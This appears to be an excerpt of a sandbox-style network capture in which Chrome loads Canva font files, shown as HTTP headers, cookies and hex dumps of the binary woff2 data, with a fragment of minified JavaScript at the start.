                                                                                                                                                                                                                                                    2024-12-19 21:27:30 UTC1369INData Raw: 7d 61 73 79 6e 63 20 66 6c 75 73 68 28 29 7b 76 61 72 20 61 3d 61 77 61 69 74 20 4b 64 62 28 74 68 69 73 2e 73 74 6f 72 65 2c 0a 74 68 69 73 2e 75 73 65 72 49 64 29 3b 61 3d 58 64 62 28 61 29 3b 61 77 61 69 74 20 50 72 6f 6d 69 73 65 2e 61 6c 6c 28 61 2e 6d 61 70 28 62 3d 3e 57 64 62 28 74 68 69 73 2c 62 29 29 29 7d 63 6f 6e 73 74 72 75 63 74 6f 72 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 2c 67 2c 68 3d 52 64 62 28 29 2c 6b 3d 5f 5f 63 2e 70 61 29 7b 74 68 69 73 2e 73 74 6f 72 65 3d 61 3b 74 68 69 73 2e 53 67 61 3d 62 3b 74 68 69 73 2e 63 72 3d 63 3b 74 68 69 73 2e 50 63 3d 64 3b 74 68 69 73 2e 4c 3d 65 3b 74 68 69 73 2e 52 62 3d 66 3b 74 68 69 73 2e 75 73 65 72 49 64 3d 67 3b 74 68 69 73 2e 47 5a 3d 68 3b 74 68 69 73 2e 54 61 3d 6b 3b 76 61 72 20 6c 3b 74 68
                                                                                                                                                                                                                                                    Data Ascii: }async flush(){var a=await Kdb(this.store,this.userId);a=Xdb(a);await Promise.all(a.map(b=>Wdb(this,b)))}constructor(a,b,c,d,e,f,g,h=Rdb(),k=__c.pa){this.store=a;this.Sga=b;this.cr=c;this.Pc=d;this.L=e;this.Rb=f;this.userId=g;this.GZ=h;this.Ta=k;var l;th


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    33192.168.2.449777104.16.102.112443600C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-12-19 21:27:29 UTC636OUTGET /YAFdJjTk5UU/0/CanvaSans-RegularItalic16711881996774813.8dbae49e1280328b442be6dfff163124.woff2 HTTP/1.1
                                                                                                                                                                                                                                                    Host: font-public.canva.com
                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                    Origin: https://www.canva.com
                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                    Sec-Fetch-Dest: font
                                                                                                                                                                                                                                                    Referer: https://www.canva.com/
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                    2024-12-19 21:27:30 UTC1248INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Thu, 19 Dec 2024 21:27:29 GMT
                                                                                                                                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                                                                                                                                    Content-Length: 42500
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    CF-Ray: 8f4a7a1c48b9de95-EWR
                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                    Age: 1867258
                                                                                                                                                                                                                                                    Cache-Control: max-age=31536000
                                                                                                                                                                                                                                                    ETag: "35a11f6a81a4fc01ba1480668513d5ef"
                                                                                                                                                                                                                                                    Expires: Fri, 19 Dec 2025 21:27:29 GMT
                                                                                                                                                                                                                                                    Last-Modified: Tue, 14 Mar 2023 06:04:11 GMT
                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                    Vary: Origin, Access-Control-Request-Headers, Access-Control-Request-Method, Accept-Encoding
                                                                                                                                                                                                                                                    Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                                    Access-Control-Max-Age: 3000
                                                                                                                                                                                                                                                    content-security-policy: script-src 'none'; frame-src 'none'; object-src 'none'; default-src 'none'; style-src 'unsafe-inline'; img-src 'self'; media-src 'self'; form-action 'none'; base-uri 'none'; report-uri https://csp.canva.com/_cspreport?app=s3_font-public
                                                                                                                                                                                                                                                    timing-allow-origin: https://www.canva.com
                                                                                                                                                                                                                                                    x-amz-id-2: hkRKihUxKvl+ePGq7C9M1JUn7+3LwHoT1KxzTtO4dryn4TyK9QzSfObQHUkHWjztivaFcljv8bY=
                                                                                                                                                                                                                                                    x-amz-replication-status: COMPLETED
                                                                                                                                                                                                                                                    x-amz-request-id: YY7JWH7ADDEZ2R5X
                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                    x-amz-version-id: 85_AfvMUSPGs5_VTyKYoCAcOAiMNaCfu
                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                    2024-12-19 21:27:30 UTC785INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 5f 63 66 5f 62 6d 3d 71 59 72 5f 4e 70 4f 42 62 78 38 36 6c 77 47 54 7a 7a 54 4a 56 30 39 30 37 37 58 69 5a 53 5f 59 63 6c 57 64 32 61 42 44 4f 52 38 2d 31 37 33 34 36 34 33 36 34 39 2d 31 2e 30 2e 31 2e 31 2d 37 30 4b 33 74 54 67 5f 43 43 67 66 51 5f 2e 6c 7a 7a 34 43 39 50 6e 41 65 79 62 78 56 51 50 67 76 59 44 4a 4e 4e 73 74 68 59 7a 75 2e 59 71 63 70 43 72 54 46 53 38 59 5a 6d 51 6e 45 71 39 46 66 30 38 43 39 2e 65 6d 6b 73 70 38 35 45 35 6d 6a 4e 36 70 6c 67 3b 20 70 61 74 68 3d 2f 3b 20 65 78 70 69 72 65 73 3d 54 68 75 2c 20 31 39 2d 44 65 63 2d 32 34 20 32 31 3a 35 37 3a 32 39 20 47 4d 54 3b 20 64 6f 6d 61 69 6e 3d 2e 63 61 6e 76 61 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61
                                                                                                                                                                                                                                                    Data Ascii: Set-Cookie: __cf_bm=qYr_NpOBbx86lwGTzzTJV09077XiZS_YclWd2aBDOR8-1734643649-1.0.1.1-70K3tTg_CCgfQ_.lzz4C9PnAeybxVQPgvYDJNNsthYzu.YqcpCrTFS8YZmQnEq9Ff08C9.emksp85E5mjN6plg; path=/; expires=Thu, 19-Dec-24 21:57:29 GMT; domain=.canva.com; HttpOnly; Secure; Sa
                                                                                                                                                                                                                                                    2024-12-19 21:27:30 UTC1369INData Raw: 77 4f 46 32 00 01 00 00 00 00 a6 04 00 11 00 00 00 01 e5 ec 00 00 a5 a0 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 81 44 1b e9 4a 1c a0 6c 06 60 00 af 6e 08 81 02 09 9c 15 11 08 0a 85 9d 44 84 d3 54 0b 89 3e 00 01 36 02 24 03 92 3a 04 20 05 91 59 07 a1 7b 0c 81 4b 5b 0d bb 91 04 55 c7 f6 de 1f 30 cc 54 95 ba ab f2 0e 3f e3 5b 39 eb 0e e2 6e 73 9c 10 74 1b 62 a9 8d 70 7e 12 1c 54 22 de cc 09 d0 1d 40 2e ba 2d fa d9 ff ff ff ff ff 7b 92 4a 8c 59 9b 83 b4 e5 40 00 00 05 55 9d 13 b7 f9 af 49 65 14 77 31 15 55 44 30 d7 39 e7 06 b8 fb 01 b8 b7 c0 dd 5d 3a dd 77 6a 18 a5 9e e6 45 16 ed 6e 83 e9 d0 d4 d4 d4 47 09 31 7c 2a a6 ed e1 91 e0 28 5d fa 52 c0 9a 9c 53 56 40 d9 4e e7 10 0f 5e 4c bc 0d 15 11 14 17 17 eb 62 b1 2a 24 f4 d5 4d
                                                                                                                                                                                                                                                    Data Ascii: wOF2DJl`nDT>6$: Y{K[U0T?[9nstbp~T"@.-{JY@UIew1UD09]:wjEnG1|*(]RSV@N^Lb*$M
                                                                                                                                                                                                                                                    2024-12-19 21:27:30 UTC1369INData Raw: aa a4 77 87 64 22 24 55 e9 4f 14 83 62 a2 d0 08 87 8c 71 48 87 95 08 c3 20 94 e7 ef 4b d5 3a 6d d5 ff bf 41 0a b2 e4 1a c2 9a da 51 d8 40 4e a4 d6 ae 5d b9 3c 75 a7 4c ca 9c 9c eb 3e 73 cb dd ef ff c6 ef ee df 0d 02 dd 20 05 a0 49 91 02 29 99 04 24 99 04 64 59 24 65 0f ba 1b a0 40 90 f2 50 69 d7 d2 84 10 e4 d9 09 89 84 1c e9 49 22 3d de 2a 87 cd f1 3c 31 cb 1b f2 e1 b8 b7 3d 5c b6 f6 e4 da d3 dc f7 74 d9 c3 69 a7 ee 7b b8 5e a3 ff fd de 9c 7d 27 7f 2f 79 9b d2 1e 74 f5 69 7d 85 7b 69 9e 41 c9 d2 b6 df 6c 6e 98 b4 d2 55 fa df 02 5d 61 24 12 15 74 69 c2 65 18 0f 1a 1c 1a f5 dd d3 f4 12 97 99 d5 dd 84 72 ff 71 18 1a 30 0d 42 1d fc f7 7f 98 fa ee 9b 99 ad f4 17 69 15 5b 4d a3 58 3f de 9a 25 14 84 00 85 f2 f7 6b a6 7d ff ee 4a 20 53 cd b2 da e3 0b 5d 7e e8 00
                                                                                                                                                                                                                                                    Data Ascii: wd"$UObqH K:mAQ@N]<uL>s I)$dY$e@PiI"=*<1=\ti{^}'/yti}{iAlnU]a$tierq0Bi[MX?%k}J S]~
                                                                                                                                                                                                                                                    2024-12-19 21:27:30 UTC1369INData Raw: 98 01 a3 bf 79 2f 19 23 40 84 f3 22 92 8c df 34 5e a9 f8 25 a2 42 11 2e d6 b7 56 bc 1d ef 34 77 55 de 4f 9b ce de f6 67 6f 0d be 98 95 07 9c 42 cd b9 34 a6 9d 42 72 3b 1d 78 19 af e0 0b 68 35 81 10 b9 e4 d8 26 ec 1f 52 6a cd e4 c4 d3 99 73 48 7f 22 60 7b 67 1b 0c a2 41 72 76 02 a2 89 93 21 97 0e bd da c4 ca ac 87 ab 4e e3 0d cf b3 59 6d c9 86 8b 52 ad bb 25 5d 20 f3 aa f1 e5 69 a5 60 78 53 54 76 11 6c 36 30 97 ea 29 b8 80 0a 3c f5 99 e8 f0 a7 90 70 6d 2c a6 5b 02 e2 8d 41 42 ab 07 e4 48 15 8b d5 35 2c 90 05 a2 4e 8e cb 65 cf 51 bd ea 9f 28 97 34 c3 1b 15 40 63 a6 81 04 d7 27 37 74 f0 0b 2f a4 a0 bd 20 46 f0 76 70 48 0b e7 e3 7e 27 1e 76 c6 1b aa e0 f3 e8 b5 da e1 92 a3 c7 84 a4 f7 ae 30 3a c0 11 d5 94 09 ba ab c4 4b fd 92 3d ac 95 dc 30 dd 44 79 51 e9 bc
                                                                                                                                                                                                                                                    Data Ascii: y/#@"4^%B.V4wUOgoB4Br;xh5&RjsH"`{gArv!NYmR%] i`xSTvl60)<pm,[ABH5,NeQ(4@c'7t/ FvpH~'v0:K=0DyQ
                                                                                                                                                                                                                                                    2024-12-19 21:27:30 UTC1369INData Raw: 06 99 32 81 95 ad 88 14 68 83 4e e8 11 d8 97 a0 bc 8a 95 ff 60 08 46 61 02 a6 60 96 9b 0b ca 9a 81 b5 44 ca 26 58 b9 18 79 58 8b cd 28 a6 12 94 e1 30 4e f2 f9 ef 4e fd f5 df 94 82 a3 b4 a3 06 2e a7 8c 94 9f 4a ee 96 55 4e b5 d4 84 8e c9 5e 1d d4 71 30 eb ee 2f 6a 11 c7 69 c5 5e cd 64 dd 87 5b 78 80 67 f2 46 ec 4f 93 df 4b 8f 02 e2 2b 41 4b 31 d9 20 99 2c 3e b5 d6 c2 24 00 83 ad 6c 17 72 85 a7 d7 4f e0 09 3c c8 a0 09 cb 05 d7 35 b1 78 4b e6 0c 89 08 91 92 aa 04 ab 72 23 a4 44 cb b9 ae 02 3b 31 8c 49 cc 39 07 8b d5 77 93 6c 4b 8e 34 44 83 9d 24 06 ce ba 17 cd 58 2b 3f 0a bc 90 77 62 7f f1 fe f4 a9 7f d6 b5 aa 5c 94 6b b2 01 35 52 79 ae 95 6c 84 86 54 c3 7c 02 5d 3a a0 d4 b5 4d 0c a8 42 0f 14 61 88 cd 96 18 1f 12 45 88 9d 95 4a 8c c8 5c 28 52 55 0b 1a a4 0d
                                                                                                                                                                                                                                                    Data Ascii: 2hN`Fa`D&XyX(0NN.JUN^q0/ji^d[xgFOK+AK1 ,>$lrO<5xKr#D;1I9wlK4D$X+?wb\k5RylT|]:MBaEJ\(RU
                                                                                                                                                                                                                                                    2024-12-19 21:27:30 UTC1369INData Raw: ec 88 a3 8e 3b e9 94 d3 11 e4 74 d1 25 15 9e 78 e6 79 04 93 ee 12 f1 09 24 c9 25 55 48 a6 88 5c 8f 35 0a 15 29 b6 d5 4e bb 94 3a 98 9a 0a a3 8d 44 ea c7 90 81 11 0e a8 ea bd 61 12 d4 12 ae f6 ee 71 95 a2 4c 0c 86 06 93 cc 04 cc 36 9f 0a 0b 2d a2 b3 c4 16 de 0a 6d 65 b3 d3 4e 76 bb ec 12 69 af 43 a2 1c f1 5c ac 4f 89 68 9f 16 a9 d1 3f 5d d2 62 00 55 28 69 8d 89 40 9b 4c 25 a3 2d 66 92 67 bb 94 a2 dd 3c 9c 9a f6 aa e5 d9 d1 67 d3 75 6c 35 2f 04 ce f5 72 fc a1 60 b8 ed 89 a1 8b d5 01 1f 48 a6 10 cc 0d 1e 0d 47 9a d9 56 db 24 5f b1 32 47 9d e8 7f 19 41 60 f3 70 a9 b8 fd 5a ef 71 81 8d 53 93 71 cc 92 69 c0 10 3d 87 22 66 1f f5 cf 68 eb bb 8b 53 43 09 01 0a c8 c1 20 c8 20 02 50 82 11 d8 94 a9 3c c8 60 3a 0d f9 98 c9 3b 0e 97 4f 3c 3e af 44 62 1e 14 40 4a 41 26
                                                                                                                                                                                                                                                    Data Ascii: ;t%xy$%UH\5)N:DaqL6-meNviC\Oh?]bU(i@L%-fg<gul5/r`HGV$_2GA`pZqSqi="fhSC P<`:;O<>Db@JA&
                                                                                                                                                                                                                                                    2024-12-19 21:27:30 UTC1369INData Raw: 30 64 02 c6 d6 76 ae 3c bb df 7f b6 01 89 47 46 c3 c2 15 2f 59 06 d1 2e 9d 98 25 2a 29 b5 e8 b2 d3 b0 49 73 fb c1 49 b9 e4 a4 b3 2e ba e6 8e 47 5e 78 d7 bf 18 1f 1a ff e7 f8 a7 4a aa 34 e8 01 31 65 69 db e6 bc a5 dc a1 05 20 a2 60 60 8b 91 d8 85 ff 4b 97 94 b2 88 c9 28 54 6b d0 a6 c7 c0 ff 8d 1e b2 fc 4d 5a 2b 37 df bd e4 ee 19 e2 e4 23 7c 31 f3 da b7 a7 48 13 9c 5c f9 2a 56 9e b2 a9 94 ca a9 2e a5 53 7d 6a 48 4d 52 2a 65 12 25 56 62 f9 a5 8e b8 f3 a5 26 fb e2 29 7d ff 39 7a 6c b5 7e fc 5a 95 d8 ef a4 cb 6e 79 e4 a5 0f 7e c4 a4 26 2f 22 e2 88 00 10 6f 4e 18 23 3f 92 a7 45 3c ff e0 ba 93 d9 b9 ab 4c a1 22 11 00 19 d5 52 42 c1 c0 4e 05 00 53 33 dc 5b 03 a6 0b 51 27 d1 18 a5 51 34 82 86 d1 10 ca 90 f4 d5 9d ff 50 dc 75 4e d3 ab b4 5a 56 aa 9b 97 08 a5 94 b8
                                                                                                                                                                                                                                                    Data Ascii: 0dv<GF/Y.%*)IsI.G^xJ41ei ``K(TkMZ+7#|1H\*V.S}jHMR*e%Vb&)}9zl~Zny~&/"oN#?E<L"RBNS3[Q'Q4PuNZV
                                                                                                                                                                                                                                                    2024-12-19 21:27:30 UTC1369INData Raw: 3e 1a 0a 15 2c 44 18 6a 1f 6b 25 5d 8a 54 69 0a b1 3c 37 d5 24 93 cd 34 c5 0c b3 e4 5a 69 a9 e5 f2 6c 57 a8 d8 56 0b 9d 72 d1 59 e7 5d 75 a1 b7 5d f1 d6 4b af bd f1 cb 0d 2e 4a 4c 23 22 8b 0a d3 79 ca e6 6d 1e bd f9 74 72 f8 5a c4 cf 62 16 ab 04 58 26 d8 0a 56 ab 05 fa 8f cd 7a 55 ac 13 6e a3 30 1b 44 da c2 6e b3 78 bb c4 d9 a9 9a 22 35 94 70 28 50 d5 0e 35 95 72 2a b3 cf 1f 0e a8 e5 90 3f 1d 94 ec b0 da 96 d5 73 56 03 e7 d5 77 4e 23 ab 5a ba a6 89 4b 5a b8 ea 2f 37 b5 75 4f 7b 0f b4 73 5f 47 8f 74 f1 54 67 4f 74 f2 58 2f af f5 f4 4a 0f 2f a5 db f0 7f 5f f4 f5 de bf be 19 e8 b3 7f 7c 35 c4 2f a3 fc 6b b4 92 54 30 21 35 8c 4f 15 13 53 87 16 b3 75 f5 4c 6f 6f 16 3e c7 9c d3 e7 9a 6f ee 59 1d bc 45 98 32 26 5b 64 72 f2 2d 8b 0d f3 c7 60 3f 0d f5 db 18 ff ef
                                                                                                                                                                                                                                                    Data Ascii: >,Djk%]Ti<7$4ZilWVrY]u]K.JL#"ymtrZbX&VzUn0Dnx"5p(P5r*?sVwN#ZKZ/7uO{s_GtTgOtX/J/_|5/kT0!5OSuLoo>oYE2&[dr-`?
                                                                                                                                                                                                                                                    2024-12-19 21:27:30 UTC1369INData Raw: 1d 10 c8 e4 90 20 41 0e 32 33 bb cd c2 e2 2e 2b ab 02 36 36 1b a6 ba 2c 8b 48 0c 67 d1 09 f5 d5 b7 58 ba 74 73 0c 31 52 ae 09 a6 1b 25 5f be 27 53 4a a3 a7 60 f1 5e ba 03 5f be ae 33 33 bb cf ca ea 06 1b 9b 5f a2 45 bb e7 6f a9 96 ea a8 8b bc c9 66 d9 0d 39 72 c8 e4 ca a5 30 cf 3c 2a f3 2d a0 b5 d0 42 1a 8b 2c 22 b7 d8 62 ca 59 42 63 35 60 65 7c 5a e5 4b bf e1 c1 83 8b 8e 8e c4 8b 97 d7 0c 0c 5e 32 32 7a 31 fe 34 06 60 0d 5a fa 81 48 91 7e 4a 91 e2 8b 6e ba a9 d4 4b 2f 9f a6 37 49 1f 2b b4 db 35 18 71 ca 95 7b e8 a5 97 62 69 fa 3f ff 45 4c 68 14 04 54 79 b4 ec 85 ef be d3 f9 e1 07 cf f9 43 b2 47 d9 ae c6 b5 46 67 81 b0 1b 4b e7 71 df 83 08 4e c7 dd 72 5c 48 f1 d9 b7 77 db cf bb 23 38 b9 d6 fe 24 05 df 91 06 f4 de 78 03 5d f8 fe fc 70 fc 51 6b 80 d8 0a 7e
                                                                                                                                                                                                                                                    Data Ascii: A23.+66,HgXts1R%_'SJ`^_33_Eof9r0<*-B,"bYBc5`e|ZK^22z14`ZH~JnK/7I+5q{bi?ELhTyCGFgKqNr\Hw#8$x]pQk~
                                                                                                                                                                                                                                                    2024-12-19 21:27:30 UTC1369INData Raw: 06 44 b2 84 da 84 e4 a7 69 33 0b 18 66 c0 40 47 57 47 ca 30 7b 8f dd de 52 cd ab d7 46 58 e5 f8 0e 37 6a de 14 83 94 80 06 65 b9 69 9b 7e d9 ac aa 47 a5 65 9e 8a f1 34 b1 f9 e9 b1 57 cd f2 cc e7 7e 65 23 bf cd 17 70 1b d4 26 de 81 bb 48 9e 56 ee 75 8c 29 6f 37 86 12 4b 4e 15 ba 77 60 b9 a6 99 b5 9e 8a ac f4 6c d8 50 68 92 bf 03 a5 8c 93 2e 7e 40 96 47 dc 65 53 6c cf f7 88 81 03 83 3c 90 c2 de b4 92 71 63 5d a5 db aa 88 e8 71 1b b6 4f 35 a2 3f 3b c9 43 b7 15 a8 4a c2 87 8f 9f 9b a6 cf db 2d 82 5b bb 18 0a af 87 1d 79 31 fc 12 19 e4 25 78 43 da ab b4 be 39 d0 eb 1b 82 d5 13 94 e8 a7 b0 d4 94 fd 06 d6 2c 47 94 cf 98 b7 68 81 e3 96 3a bc f3 0e ab 8c 01 84 69 b2 1a 82 c3 b6 72 06 10 ae 3d f4 f0 18 81 28 c6 0f 15 0c 21 c2 a0 68 84 00 e2 50 c9 10 22 0d bb 8c 1d
                                                                                                                                                                                                                                                    Data Ascii: Di3f@GWG0{RFX7jei~Ge4W~e#p&HVu)o7KNw`lPh.~@GeSl<qc]qO5?;CJ-[y1%xC9,Gh:ir=(!hP"


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    34192.168.2.449776104.16.102.112443600C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-12-19 21:27:29 UTC636OUTGET /YAFdJjTk5UU/0/CanvaSans-Regular15263162195051178836.f4.f4a4890561b3fddfd1fd9a1b27b6d4a4.woff2 HTTP/1.1
                                                                                                                                                                                                                                                    Host: font-public.canva.com
                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                    Origin: https://www.canva.com
                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                    Sec-Fetch-Dest: font
                                                                                                                                                                                                                                                    Referer: https://www.canva.com/
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                    2024-12-19 21:27:30 UTC1248INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Thu, 19 Dec 2024 21:27:30 GMT
                                                                                                                                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                                                                                                                                    Content-Length: 40708
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    CF-Ray: 8f4a7a1c5e25c434-EWR
                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                    Age: 1694916
                                                                                                                                                                                                                                                    Cache-Control: max-age=31536000
                                                                                                                                                                                                                                                    ETag: "ffe7cc3945dcff0497df9901158ca5c9"
                                                                                                                                                                                                                                                    Expires: Fri, 19 Dec 2025 21:27:30 GMT
                                                                                                                                                                                                                                                    Last-Modified: Tue, 14 Mar 2023 06:04:11 GMT
                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                    Vary: Origin, Access-Control-Request-Headers, Access-Control-Request-Method, Accept-Encoding
                                                                                                                                                                                                                                                    Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                                    Access-Control-Max-Age: 3000
                                                                                                                                                                                                                                                    content-security-policy: script-src 'none'; frame-src 'none'; object-src 'none'; default-src 'none'; style-src 'unsafe-inline'; img-src 'self'; media-src 'self'; form-action 'none'; base-uri 'none'; report-uri https://csp.canva.com/_cspreport?app=s3_font-public
                                                                                                                                                                                                                                                    timing-allow-origin: https://www.canva.com
                                                                                                                                                                                                                                                    x-amz-id-2: 1h6KIU47MQGjLk94Ye+UnrF0D5WlD50BqGz9iQdTgvAOuhDm8yjT+Gp16GmNfPced+sSkFiPGE8=
                                                                                                                                                                                                                                                    x-amz-replication-status: COMPLETED
                                                                                                                                                                                                                                                    x-amz-request-id: XK1QR6N5CW9XXJSD
                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                    x-amz-version-id: OJ_yhNdZoGC0DW8etzFxE4iRIRAZBlGl
                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                    2024-12-19 21:27:30 UTC789INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 5f 63 66 5f 62 6d 3d 75 69 66 6a 49 31 6a 36 32 48 44 57 43 77 70 4a 70 64 35 65 65 34 4f 32 35 69 45 5f 57 38 69 61 6d 37 4e 4a 75 56 35 5a 75 56 59 2d 31 37 33 34 36 34 33 36 35 30 2d 31 2e 30 2e 31 2e 31 2d 43 57 6c 50 71 38 66 78 6e 35 57 77 50 53 7a 52 6f 4d 75 6a 52 79 75 7a 6f 69 33 64 6a 79 43 43 4e 50 52 66 69 42 61 44 74 53 76 44 50 79 46 56 4e 7a 53 4e 79 53 73 35 6c 35 5a 76 30 4f 4e 68 72 73 71 76 76 62 31 43 52 6e 38 4b 72 68 78 6c 69 64 5f 36 66 67 3b 20 70 61 74 68 3d 2f 3b 20 65 78 70 69 72 65 73 3d 54 68 75 2c 20 31 39 2d 44 65 63 2d 32 34 20 32 31 3a 35 37 3a 33 30 20 47 4d 54 3b 20 64 6f 6d 61 69 6e 3d 2e 63 61 6e 76 61 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61
                                                                                                                                                                                                                                                    Data Ascii: Set-Cookie: __cf_bm=uifjI1j62HDWCwpJpd5ee4O25iE_W8iam7NJuV5ZuVY-1734643650-1.0.1.1-CWlPq8fxn5WwPSzRoMujRyuzoi3djyCCNPRfiBaDtSvDPyFVNzSNySs5l5Zv0ONhrsqvvb1CRn8Krhxlid_6fg; path=/; expires=Thu, 19-Dec-24 21:57:30 GMT; domain=.canva.com; HttpOnly; Secure; Sa
                                                                                                                                                                                                                                                    2024-12-19 21:27:30 UTC1369INData Raw: 77 4f 46 32 00 01 00 00 00 00 9f 04 00 11 00 00 00 01 d8 84 00 00 9e 9f 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 81 44 1b e8 3a 1c a0 0c 06 60 00 af 6e 08 81 02 09 9c 15 11 08 0a 85 85 34 84 bd 72 0b 89 3e 00 01 36 02 24 03 92 3a 04 20 05 90 73 07 a1 7b 0c 81 4b 5b d5 ae 91 02 aa b7 7e f9 21 02 d4 5d 55 07 3f df b5 11 e0 08 3a ee e3 49 81 de 2c 37 f1 73 bb ea ab 03 b8 b3 2b 06 bd 59 92 c0 f8 f7 b3 9e fd ff ff ff ff 7b 92 c5 18 f3 fe d1 7b 00 d4 69 6a a6 35 b3 b4 b5 36 10 e6 03 62 b2 5c c1 0b 2f 6a 85 e5 69 bc f6 65 26 5a 82 e6 3b 1f 18 70 ea 63 44 48 43 4a 71 ac 2c 9f 53 0a 21 da 54 4f 31 c8 8b 19 1a 64 30 60 5e b4 2b ce 5a 07 af 2d 17 d3 6e f8 2e 7a 9d 71 27 36 70 b8 68 0f f7 ef e2 9f 69 4e 41 72 56 b2 48 fb a4 59 af d2
                                                                                                                                                                                                                                                    Data Ascii: wOF2D:`n4r>6$: s{K[~!]U?:I,7s+Y{{ij56b\/jie&Z;pcDHCJq,S!TO1d0`^+Z-n.zq'6phiNArVHY
                                                                                                                                                                                                                                                    2024-12-19 21:27:30 UTC1369INData Raw: 96 67 e6 9c 51 14 22 85 58 45 a7 4c bc 21 2a aa 6d d3 93 fd 25 47 f3 fc e7 9f 39 f6 a2 c6 4b a4 b0 83 b4 e4 78 b5 41 6c b1 02 ac 96 a0 0a 51 b5 5d 8a 9e a8 29 52 a6 cc ff 5f aa be db f7 de 80 d4 d0 a2 13 d0 fa 85 b6 53 c4 5f e9 56 ce 9e 32 21 31 a5 97 d5 ef 83 fb de e0 cd cc c3 00 e0 00 a0 51 54 28 80 92 49 42 85 c4 c8 32 05 ba 60 66 40 0a 04 29 9b 2a 2e 94 fd 4b 97 ff ef 92 7f 8e 7e a7 48 57 ca f6 b1 28 5b 39 51 4a 69 eb 9c e3 d6 7e eb 8b 4d 4a 5f ac 72 b2 72 b2 fa bb 65 16 ab 64 b7 ca 76 95 e5 26 f6 ef b2 d9 bd 3f 94 5c 42 cb 42 37 0e ef f6 cd 50 33 57 d9 53 8b e2 94 c4 bb e2 84 82 9e 9f 0b b3 19 d8 0f 59 a8 92 4f 08 51 5b 2e 27 f2 d3 5c 6f f6 cd 96 1d 20 4b 53 63 f0 25 9f 92 ec 7e c8 96 b2 5b ca 96 70 52 4c 91 79 ca d9 62 7e 09 53 00 90 8c 0a f1 ce 92
                                                                                                                                                                                                                                                    Data Ascii: gQ"XEL!*m%G9KxAlQ])R_S_V2!1QT(IB2`f@)*.K~HW([9QJi~MJ_rredv&?\BB7P3WSYOQ[.'\o KSc%~[pRLyb~S
